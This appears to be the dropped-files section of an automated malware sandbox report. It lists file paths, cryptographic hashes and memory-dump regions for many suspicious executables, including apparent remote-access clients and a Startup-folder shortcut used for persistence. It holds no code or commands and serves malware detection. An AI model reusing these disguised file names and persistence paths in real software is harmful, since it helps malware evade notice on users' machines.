C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe

MD5 1b3e9c59f9c7a134ec630ada1eb76a39
SHA1 a7e831d392e99f3d37847dcc561dd2e017065439
SHA256 ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae
SHA512 c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 779cd601cff7c5bf05b450b6fc14151e
SHA1 e97d46d39c43d8afee08157f63a37b65e469cee2
SHA256 9a6740e8e9837376a58a26919392e028a768f4fb2393d55fe9f54f01c8f36947
SHA512 73c0a290b634b5ec9a92c5d8bf324c5bd27ce71305865329af5ea56f69c3449aa30c9bf8ec6e6fa336dd817d9b4c60011b79ee7b32327ab88f0d114b6d3843da

C:\Windows\SystemTemp\msedge_installer.log

MD5 0f3e6069eea86aec870d6239d014086b
SHA1 7723b038f56e7b254f6554084b4e8ff6705a6017
SHA256 4467297bfe1367c24b8e504beb669a0f06e6ffca47dd736f9e3ffbeccce9b0c0
SHA512 1345b1e43b67ba421aee512f82bdb484dec0392e936eaa08a2a98fadeb39d2e9af212db7b50ce479f4ac94956e25af4f6722e6c185825c2f2ed0f49ac3fd58fd

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

MD5 ad5f7dc7ca3e67dce70c0a89c04519e0
SHA1 a10b03234627ca8f3f8034cd5637cda1b8246d83
SHA256 663fe0f4e090583e6aa5204b9a80b7a76f677259066e56a7345aebc6bc3e7d31
SHA512 ad5490e9865caa454c47ec2e96364b9c566b553e64801da60c295acd570017747be1aff6f22ca6c20c6eee6f6d05a058af72569fd6e656f66e48010978c7fd51

C:\Windows\SystemTemp\msedge_installer.log

MD5 07a9aa87a8c861215501d2532cf3e7a1
SHA1 daa7d7370d225d81df0adec7280384567c5e67f3
SHA256 f4b08f7ff5d16e8f27505efbedde249701e741edcaff8c815372e1234704a231
SHA512 bd32238c3acdca398a8d31dc86036950e18efa8bf3cf509572e2ea668c89bb3ff3bbb03b40fe3f844f9c7e5688b6c592c0f8a73719b17a8f4ae16e26128cf36c

C:\Windows\SystemTemp\msedge_installer.log

MD5 0247081b44d5644a5c3e44d6a11aad1a
SHA1 39bf1c5c65616705e08323d4b6a5145cfccbb5a5
SHA256 1a8bdcf24fe7eeec5d8560f1c56b78c5b73f849ab9b9256c7dfbfe87eddc16ec
SHA512 7ec8ecc140702dccb2e1bdeacbaabfee2e1f55746cec1e03d96d831a07ec0f63db1efb33716463593a84bb194c78edfeb4cd2fef75d82354ef5534b5e82c6b07

C:\Windows\SystemTemp\msedge_installer.log

MD5 e20d6bc803d2f872c0f497c10cfb6e0e
SHA1 b92362717d2e710491fe3c122c07e886aeada6b8
SHA256 e05cb7d920d3c3bfe92b297842c75a2a9422e8773c262adb714cb8dac19107a0
SHA512 57f01a7d709ce0e6108691f0b571603bc7c0133541f8f846d824588b2ee0edc9bfbb5bfae7e1dd2700b165f30a6d73a6bd935522db1f0f94b965c9c6d091a3d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 d246f2c671afc9346598fd5d87a7b57e
SHA1 15f60ef5273315aece523dc6edf1ae20ea182d13
SHA256 54fb6b9061ffcaa6903670f12e4bb636fc80716121a78ab4815483d4a38ddf3b
SHA512 fbfb55fe6ca30ce67a7d1ba99b7e99ae2f9c744010e48056c6043769e3a852ac09e3d69160d698bec5a6895b25788a844d1113922f9c25905b712f53afd1e210

C:\Users\Admin\Downloads\ProcessMonitor.A5XPEh6u.zip.part

MD5 213d09599b9761a8e78c20b3f8072636
SHA1 815ae249e5dc5bcdd8576ff29d3ec39e20c761f7
SHA256 d4ed579fdc1957fde0124dd41efd8d72af0529254984bfa5a3864ecd8b539252
SHA512 f656e128fcb0269946cfa03adc5392676c17b18f309e0476b2153fe545e4d92641e7849b94743e84fce39366b0b72f04e725b7922ccf513deaba8aef833ad971

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\downloads.json

MD5 6b2ad5c6c695c3cc700ffe38dacd6217
SHA1 4309adf8a3cd531f6c3b67d3b03c40bd4b85195c
SHA256 0b9f0747ae011d90155d1682c08f72e26b9c172d97b6eb65db332bd4950c7a7b
SHA512 06426a1d9c0cd1b1b201d3d48f017eaf216245546bcd29427a73885aa213dcee3c1cf7636d6557d1b7e872e955ef8385c0fd5d423564e982f54d267135c44a22

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 7e1001b1bcac5467e5cf1558109e446c
SHA1 c9e20c4b91ef523741ac3e6819de6d8ab46127ae
SHA256 6bf6a0ba02c3b74a6cac86787637511cc3e5b035ef6324264927aaba4d5d50e2
SHA512 5f9e3f6dbb4976c1cb0ee9ab9abe150e253712a0729cf530c8121b3797e8c2b2338b91695984f4f28f2b7901bad8b356978258e2687107bb0a5d52516ebb6830

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2BLSF3ORHG6FMWB8DPVL.temp

MD5 7dea74601167aac27132f62f4178466f
SHA1 6901237ebff52ba974c7d2afedd0a2ec42745738
SHA256 a05cfb75d65c617770885d875582bbe9c558080e6cdfeb256e8ee5ffc0ec23a0
SHA512 16794730b1d3224e3166bb19ac400f6a97662cd87c5d6d41c43a89cbae59da0b1bd5032a43206a5220653144f87d802a4cd022f9cefbd264baced3af3ff4ad7b

C:\Users\Admin\AppData\Local\Temp\Procmon64.exe

MD5 223b222ce387a7f446d49a1ee9b572bb
SHA1 8ed888a02861142e5eb576385568c2ba0ddd8589
SHA256 3e15995894f38b2eead95f7ff714585471f34f3af3d8f50a7f83344781502468
SHA512 037b4787af5fb129a3b1e0ac9565e59d5a55ef26ccf93bc9adf685c08422071ee0d0eb4667cd2ce0d725c7dea0209c1d7d48baf58cd18dfb58de35bf7feef1a2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

MD5 c472fd84dbc8355ea14e259775c8d4a8
SHA1 aa66e116005f48c1b69bd751f6dc59bc02b07715
SHA256 f8243d1c5e0aa5c591aceeff2518aeca91abf343cb8601aa688328d0c4827c5d
SHA512 b12ef30ddf08e174bcac2ecaf80eb8c94a7c07c52653eaa907b0555c2da8cfa77d4357d371d526f156d0ec986b6417bf14bb7186db681adc925012899625f142

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 abc1cf7f78e1a453ff4d5a1474ddd774
SHA1 59d0c17cd5c5e45db110d7f19efc463619c53600
SHA256 e3e48bd411b9b2b34eedf805fa7c5674d5a1a9310e701bbf2d05e7bab1d9ced4
SHA512 d3f21ffbb1ac6d20ee130610efdbea64822b0fc83fa637be841ac9085cf264fd97cc3a1f07f08dab4610216591131a6054cdd13ef6df53575fe3de065437c226

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp

MD5 2aa5225f548f182482e99c2b15f75852
SHA1 69a339b92d16c79a11310007bdd91e88f73eb9f3
SHA256 fa6c8f2c2074c8ac96ab429b22f7b3cdc492b10577ee4ccf2d117c9ba0be94c9
SHA512 1d955dea257a6d410678177225522679e17b4d0731b47baeaeb628432b2b2335b1d5b60f5ff060020bb01d06540a1b613b94378ad27c98f19752ad511f2c7bda

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionCheckpoints.json.tmp

MD5 910f3331aa73246ceaa9e1c7fd064654
SHA1 6d8c663beff7ede9b6b85cf25582264078910e13
SHA256 8483cb8ad1e406195deaf61c4f8270053514aa365d44865637ce927909daade7
SHA512 94e3f0e82c8c1f0d075a07445814b6b95d0d916fe397b7d059920f818e818fd75f309a60636b3b4345e22b3bf2446b35574a055cef8b5d681c33febb0549add4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js

MD5 3f5cb68f3fe0bf79cbf73ab9370a126b
SHA1 430b7963f5473dae2dd73ddce7e77b29a4ef8e0c
SHA256 0a486148e1630b237b4276b30abf1657efb66728dce6f2906691ff7b0db5def8
SHA512 9d96b09428cebe0f501ffa37a29344ea079ea4ececfb6975947d6bf2b07adbc48fa575b8e47f6cb6d8e8316499db6adb37227aa19afc176f125cf54e9ae7bd97

memory/3640-1525-0x00000000001B0000-0x00000000001B8000-memory.dmp

memory/3640-1526-0x0000000004CC0000-0x0000000004D5C000-memory.dmp

C:\Users\Admin\Desktop\Files\Fast%20Download.exe

MD5 97d80681daef809909ac1b1e3b9898ba
SHA1 f0ecc4ef701ea6ff61290f6fd4407049cd904e60
SHA256 345d5d2759abd08a84c4c2e2a337a1babd02b5eda3921db1b83eb5d5f5ccc011
SHA512 f90bb8868612f5bc52c07cf90c4e62daf47ba3a3418fae3a82030bff449d62cd83ce185b22fdae632abdb661c8e3a725cc5fa5c44e47ca34f9ccbda6fafd21da

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk

MD5 1480e1832a1c3b23dafaa69ddfedfb8d
SHA1 428c66ffd881997b8b24509b7811e7c9f8e64b0f
SHA256 93f5698bfa6f6301d09cdcf9c3d6fa524297335dc1b8fd267da72c0da91af63f
SHA512 a62460266cadda021a0a483562631502a2fa0534fe318cb6fe87336c09bb0889edcbc1681b79142e42b8803d274462b25398991b9ec570a5e3295319472d0eb4

C:\Users\Admin\Desktop\Files\XClient.exe

MD5 63384bf1d08b472b5c594f4aac46f950
SHA1 eee21f5bf3d6e83c6367056610ff4bfed06653c7
SHA256 cebaf3c3a4d1a842c50daa423f1e81a9d067aec9cda327f745a50d8636ec9352
SHA512 66500ff099939a2359df8558769af77461b6b4185000ab951ec7661fcd1e89f36389ba82dd17675e99ea6243810593ca9a0500bc838d7038ee06774342c0f697

memory/5356-1549-0x00000000009B0000-0x00000000009C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4slk1yg2.45b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5708-1552-0x00000148B4C00000-0x00000148B4C22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4be454dcbec32af10161f739ec237fc
SHA1 44d5b3b34f92818563efeb37dc75442273cc2bf3
SHA256 4436e1add60e37baccc40f44b93b8ee2baf4261b5e3e45a834ba350ec9658f15
SHA512 a925de5c086cb81b50136d78dc7aea45f8205b57ae8b6219f3d00016b33ebec7e85d7630baf0c09ec2ed29a87c68f0cdefcfd21eb7e99a5679dc632cb725fc4f

C:\Users\Admin\Desktop\Files\built.exe

MD5 a813f565b05ee9df7e5db8dbbcc0fa43
SHA1 f508e738705163233b29ba54f4cb5ec4583d8df1
SHA256 ba59fb813ff718db8a17c4e5d244793d2199383969843ad31d09727b5e5ff156
SHA512 adb431c372c2e1d0f6019bedefe16a2253fcf76929ba7e2b9f9cc7a253137920615121a1a64f7003a43f39e8b17ace233daca32b2933b6953aa6cf558b834e2e

memory/3300-1604-0x0000000000610000-0x0000000000934000-memory.dmp

C:\Users\Admin\Desktop\Files\key.exe

MD5 4cdc368d9d4685c5800293f68703c3d0
SHA1 14ef59b435d63ee5fdabfb1016663a364e3a54da
SHA256 12fb50931a167e6e00e3eb430f6a8406e80a7649f14b1265247b56416ac919b0
SHA512 c8f9d2ba84603384b084f562c731609f9b7006237f2c58b5db9efdfc456932b23e2582f98fb1eb87e28363dc8d9ae4c0a950c9482685bb22604c66a1e6d611de

C:\Users\Admin\Desktop\Files\contorax.exe

MD5 771b8e84ba4f0215298d9dadfe5a10bf
SHA1 0f5e4c440cd2e7b7d97723424ba9c56339036151
SHA256 3f074fb6a883663f2937fd9435fc90f8d31ceabe496627d40b3813dbcc472ed0
SHA512 2814ef23653c9be5f5e7245af291cf330c355ed12b4db76f71b4de699c67a9ffd1bdc0cc1df5352335b57ab920404b9c8e81cd9257527264bde4f72a53700164

memory/1276-1623-0x0000000000530000-0x0000000000550000-memory.dmp

memory/1276-1624-0x0000000002650000-0x0000000002656000-memory.dmp

memory/4488-1637-0x000000001BC00000-0x000000001BC50000-memory.dmp

memory/4488-1638-0x000000001BD10000-0x000000001BDC2000-memory.dmp

C:\Users\Admin\Desktop\Files\Sentil.exe

MD5 cff3e677b6383632eff6d1b52cd6d277
SHA1 0936fb4aa7e39f2b56bc1b4c9364bb95e8f0c2a8
SHA256 0d57b81c8c42d3450782af358d0938d813abc28ec18b3ad6c81bd680a3efbbea
SHA512 ddc33da48cf00e6ee4a57a07a98630082082f5cf76b9c1f844b17ff7f8328f0986a0d95f458947c6ca141a657991b31c608d9b3a9bdc83428ee53e55a34c2e61

memory/5508-1655-0x0000000000C70000-0x0000000000F94000-memory.dmp

C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe

MD5 108530f51d914a0a842bd9dc66838636
SHA1 806ca71de679d73560722f5cb036bd07241660e3
SHA256 20ad93fa1ed6b5a682d8a4c8ba681f566597689d6ea943c2605412b233f0a538
SHA512 8e1cdc49b57715b34642a55ee7a3b0cfa603e9a905d5a2a0108a7b2e3d682faec51c69b844a03088f2f4a50a7bf27feb3aabd9733853d9fb4b2ee4419261d05b

C:\Users\Admin\Desktop\Files\Security.exe

MD5 f8862a71544afeafbd2ed09e19e33b50
SHA1 beff8d7435af5b6dcc54bb47fb1b5a61a5faa4bf
SHA256 d3ddea55a7fdb26efcf9d220940191fa07ed291d1b7dce2c7f6f157575886ebb
SHA512 3f16e8b0076698bb2dcbf651fb1227192ac4ebd6a960097f26620f073c5c4e7180703c631e5a11929dc5d00cbd02a89273ba79369d117fb3533ee7f8fe632033

memory/680-1681-0x0000000000F20000-0x0000000000FA0000-memory.dmp

C:\Users\Admin\Desktop\Files\Client-built.exe

MD5 fa5f99ff110280efe85f4663cfb3d6b8
SHA1 ad2d6d8006aee090a4ad5f08ec3425c6353c07d1
SHA256 5b41a8ac5a68ab33e4891ea03533e8ea650c16dd669d277decae2f00217a1e4d
SHA512 a3b898f758060f124c443422c6dc88ba80d9892890b25d21e37a1d3947cd4b9dbef403382ee6e28c1007785a63c5fa387f7d00403db433eb59c03d0b2a88b50e

memory/1664-1696-0x0000000000DE0000-0x0000000001104000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77Security.exe

MD5 12c1eb283c7106b3f2c8b2ba93037a58
SHA1 540fc3c3a0a2cf712e2957a96b8aff4c071b0e7e
SHA256 35eb77c5983a70f24ba87d96685d1e2911b523d5972dfcbccf3e549316ff16f1
SHA512 72d25cb84ba32b3680edbbf9be92ab279cb7caef6e166917ec68a7eb7c8530b926565faab8a98b05125ad16359149a86dee19b083531a21ac3b41f0c77c5349d

memory/5744-1715-0x00000000003F0000-0x0000000000404000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

memory/3352-1742-0x000001CDB5BE0000-0x000001CDB5C0A000-memory.dmp

memory/3352-1743-0x00007FFCF5C00000-0x00007FFCF5E09000-memory.dmp

memory/5192-1747-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3352-1744-0x00007FFCF4850000-0x00007FFCF490D000-memory.dmp

memory/5192-1750-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1748-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1746-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1745-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1753-0x00007FFCF5C00000-0x00007FFCF5E09000-memory.dmp

memory/5192-1754-0x00007FFCF4850000-0x00007FFCF490D000-memory.dmp

memory/636-1767-0x00007FFCB5C90000-0x00007FFCB5CA0000-memory.dmp

memory/684-1778-0x00007FFCB5C90000-0x00007FFCB5CA0000-memory.dmp

memory/988-1789-0x00007FFCB5C90000-0x00007FFCB5CA0000-memory.dmp

memory/432-1793-0x0000026764250000-0x000002676427B000-memory.dmp

memory/988-1788-0x00000299D57B0000-0x00000299D57DB000-memory.dmp

memory/988-1782-0x00000299D57B0000-0x00000299D57DB000-memory.dmp

memory/684-1777-0x000001872BD10000-0x000001872BD3B000-memory.dmp

memory/684-1771-0x000001872BD10000-0x000001872BD3B000-memory.dmp

memory/636-1766-0x000001A913380000-0x000001A9133AB000-memory.dmp

memory/636-1760-0x000001A913380000-0x000001A9133AB000-memory.dmp

memory/636-1759-0x000001A913380000-0x000001A9133AB000-memory.dmp

memory/636-1758-0x000001A913350000-0x000001A913375000-memory.dmp

memory/5192-1755-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2304-2734-0x0000000000590000-0x00000000008B4000-memory.dmp

C:\Users\Admin\Desktop\Files\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

memory/5860-2900-0x0000000000C30000-0x0000000000C42000-memory.dmp

memory/4856-2946-0x0000000000220000-0x0000000000544000-memory.dmp

memory/2128-3090-0x0000000000A80000-0x0000000000DA4000-memory.dmp

memory/4052-3200-0x0000000000A40000-0x0000000000D64000-memory.dmp

memory/1580-3331-0x00000000002F0000-0x0000000000614000-memory.dmp

memory/5616-3441-0x0000015909920000-0x0000015909DF4000-memory.dmp

memory/5596-3707-0x0000000000280000-0x0000000000292000-memory.dmp

C:\Users\Admin\Desktop\Files\winlog32.exe

MD5 741b73ac32f93409f2eff52fc470acd7
SHA1 145518dd63cd26471db279c04671ecc581ff19ba
SHA256 533ffecb86555b7eb74923b557f289b5a7f1c820baa3e0ec76a1bcf27aa06bad
SHA512 0027f14ca6dedd8f9f4ceb87fc38888be18782fba3262144555a2b72355b9baf37f03b80274dace7a6d2fbec3012e54db17be26d20ca124a4b4b8b7a9fc49ec8

memory/1868-3752-0x00000000007A0000-0x00000000007AE000-memory.dmp

memory/1868-3762-0x0000000006340000-0x00000000068E6000-memory.dmp

C:\Users\Admin\Desktop\Files\TPB-1.exe

MD5 d7cc70050313b6ac928a516957342346
SHA1 87ebb959c7f27892466abd20cca68b705019e6bd
SHA256 8bc4c1e92cfffe6d52dd7f5c65263e24dbc7bc470dbf631e782afd5e90ef5ee3
SHA512 f930483f2a0bcd394addd8103affe8bc52f491d24e034d68c55a09012026b150eaa5be4cfdf2313ad31b3b7d00d11fabdbd53b146dc0b6a0b50f16e877003846

memory/5332-3785-0x00000000002D0000-0x0000000000336000-memory.dmp

memory/5292-3899-0x0000000000E60000-0x0000000001184000-memory.dmp

memory/1660-4071-0x0000000000770000-0x0000000000A94000-memory.dmp

memory/4964-4217-0x000000001DA50000-0x000000001DF78000-memory.dmp

memory/3472-4237-0x0000000000CB0000-0x0000000000FD4000-memory.dmp

memory/5216-4383-0x0000000000DC0000-0x00000000010E4000-memory.dmp

memory/3868-4522-0x00007FF77D1F0000-0x00007FF77DDF5000-memory.dmp

memory/232-4582-0x0000000000330000-0x0000000000654000-memory.dmp

memory/5876-4637-0x0000000006030000-0x0000000006354000-memory.dmp

memory/5876-4638-0x0000000005DA0000-0x0000000005E32000-memory.dmp

memory/5876-4639-0x0000000005D30000-0x0000000005D3A000-memory.dmp

memory/5876-4640-0x00000000074D0000-0x0000000007AE8000-memory.dmp

C:\Users\Admin\Desktop\Files\svc.exe

MD5 0b0c3613bead9d95c8f62955129bc6ca
SHA1 d0639a290e178e152e50b50c185d08f79ab52629
SHA256 da8cbf6c2b20389be881bb0c84a74d8a84c525df491f44f883b424075f9391be
SHA512 fbd1b2213a85402c98b4588cf7757a9745c50a974dea21a87e73e572bb0c6d2b473db39a2b4043e48b90da364f7fc30462df1340921401ed16ce4b958c747f26

memory/5876-4647-0x00000000067B0000-0x0000000006800000-memory.dmp

memory/5876-4675-0x0000000006FD0000-0x0000000007082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\History

MD5 4e2922249bf476fb3067795f2fa5e794
SHA1 d2db6b2759d9e650ae031eb62247d457ccaa57d2
SHA256 c2c17166e7468877d1e80822f8a5f35a7700ac0b68f3b369a1f4154ae4f811e1
SHA512 8e5e12daf11f9f6e73fb30f563c8f2a64bbc7bb9deffe4969e23081ec1c4073cdf6c74e8dbcc65a271142083ad8312ec7d59505c90e718a5228d369f4240e1da

memory/200-4717-0x0000000000630000-0x0000000000954000-memory.dmp

memory/232-4827-0x0000000000D00000-0x0000000001024000-memory.dmp

memory/2680-5580-0x0000000000400000-0x00000000008BF000-memory.dmp

C:\Users\Admin\Desktop\Files\sam.exe

MD5 b839c74b5c9862a8902eaa56dddab109
SHA1 ff68138c57d5714133a47624d7e072a3df697b90
SHA256 b9ef9df1d52d9cc69f95c7b8ea9ba339d3e81bba7f8e3a9b542c7b1287630bf6
SHA512 c150b7977666f1ff539c2e1437e2d60b01057ed2971f6c818e9397f517caa656870bc63ac6524e8b7b383c97c1889a24d4997bc9f2f6fde1ae1b062862d68cf9

C:\Users\Admin\Desktop\Files\CrazyCoach.exe

MD5 42f4afaac5036765b62b06cfd1269d14
SHA1 9576960c3357a9fb330ccbe87c7237f47e7ac897
SHA256 57330e824af5acfab6b83494ad5ce3e7d66e66e91d233434babcdd3dde879e1d
SHA512 caaaaacc6a61269df2dda4daf59a0fe2a110e012f1e735da58ef66030cc763173696b86672400ca7f76ef12ca6212ba1bb393b1596527625da685a42712c52e7

memory/2680-5674-0x0000000000400000-0x00000000008BF000-memory.dmp

memory/6000-5678-0x0000000000FB0000-0x0000000001070000-memory.dmp

memory/1680-5719-0x0000000000BE0000-0x0000000000F04000-memory.dmp

memory/3840-5772-0x0000000000850000-0x0000000000868000-memory.dmp

memory/5620-5810-0x000001D9E7270000-0x000001D9E72A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Impacts.bat

MD5 e66bce26cc9f5ea1c9e1d78fdb060e57
SHA1 5a83a6454cb6384fdaaf68585d743da3488eed28
SHA256 34e6b48e8a53c7f983f7944c69764cbac28fbd0d2283e797506d0e256debf3d2
SHA512 94ef52636660fb3d7aadc10459460781d95e1d83389e3519f19d093806f273b330b4596f03ac1f9268aad45a244e537ff6d0ba773be33c627fe86f18128bff7e

C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe

MD5 9436c63eb99d4933ec7ffd0661639cbe
SHA1 12da487e8e0a42a1a40ed00ee8708e8c6eed1800
SHA256 3a79351bd8099a518ecb4258aacecc84f7ed44cf67426b482b7583ce20c17e4e
SHA512 59bc369bf7d96865be7e2f0b148e8216804c7f85d59958e7cc142770b44a84a266db8aec05b28bed483828f84abd81a21b3d40cdda230c1a534f6b380a387c44

C:\Users\Admin\Desktop\Files\XM.exe

MD5 0940599cefe789664d6a032a27b25b73
SHA1 c6ee1fe58fdd7ba3c3f3d0e708228e53050cf4fa
SHA256 ed42c5f70c10694c1376f330cfbdcee52b72aed3b7eb25debcc1b2ba613c0922
SHA512 47c01da51b42cb086202d05f01613d81b75e37a8b718f13597a18d8693e3a6f8666d28d9c79abcd143d1d3c93d7a4051e551f4354306a7b57507967bc9adf781

memory/5492-6596-0x0000000000650000-0x0000000000704000-memory.dmp

memory/5492-6597-0x0000000001070000-0x0000000001152000-memory.dmp

C:\Users\Admin\Desktop\Files\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

C:\Users\Admin\Desktop\Files\surfex.exe

MD5 1f4b0637137572a1fb34aaa033149506
SHA1 c209c9a60a752bc7980a3d9d53daf4b4b32973a9
SHA256 60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648
SHA512 4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86

memory/6936-9541-0x0000000000B00000-0x0000000000B54000-memory.dmp

memory/6204-9556-0x0000000000400000-0x0000000000450000-memory.dmp

memory/5492-9559-0x0000000000EE0000-0x0000000000F2C000-memory.dmp

memory/5492-9558-0x0000000001150000-0x00000000011C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpF7C8.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/6204-9584-0x0000000005D20000-0x0000000005D96000-memory.dmp

memory/6204-9587-0x0000000006730000-0x000000000676C000-memory.dmp

memory/6204-9586-0x0000000005DC0000-0x0000000005DD2000-memory.dmp

memory/6204-9588-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/6204-9585-0x0000000006800000-0x000000000690A000-memory.dmp

memory/6524-9643-0x00000000008A0000-0x00000000008B2000-memory.dmp

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\SETUP.EX_

MD5 1a59a8af3c58b30ff0fe71db2196b24b
SHA1 6b0e5ba36f4fc5328ec494272054a50cafa13e68
SHA256 ba25974b29a25cb7bc1f58a0990a8ce758354aa6ec5b8b8af210f2c1466ba49d
SHA512 f173fe15db8d7aeef4f6fa62a41246550ccee207e6388095a5f87036362d4c95da646e1a7c68764054556e024da80b749646425076e9bfac42fb77be8f2c0355

memory/8180-9860-0x0000000000F40000-0x0000000001264000-memory.dmp

memory/6440-9944-0x0000000000370000-0x0000000000694000-memory.dmp

memory/6956-10064-0x0000000000B50000-0x0000000000E74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

MD5 e18ff32f235079a5b06d8ef0b5e135d4
SHA1 30782031c29c370b4637882202776bc092b2b098
SHA256 99703b09d6585f8ef49bdefba101a9f388056a393f7b3b5bfc42d44835f80ca4
SHA512 b884b5551063e8a4516b25d957728295c97f3bb16d01834b84a54d2dd512beb24c8df91e87040b2c8738d36786b7d94c3fa2257c7ba644890794e67f1df262d3

C:\Users\Admin\AppData\Local\Temp\temp_16943.exe

MD5 eba33219c7bdec31cab46dc3c5735e76
SHA1 bf9339f46d7a33d342aeb7fca8b5d5fb8b4d165a
SHA256 4d9440023af17170008531098b4a9e25f4fcfd29782c872a5e616fcb33dfa6f6
SHA512 a74c43e45ff7e771065879b640097a169b49225ebcfa747351db445a4f253105b7535e438a7e4e82e13b9a9fcc62f6cfe49a8760499f9e9efc2002a965a43774

memory/6260-10169-0x00007FF6D9520000-0x00007FF6D95B5000-memory.dmp

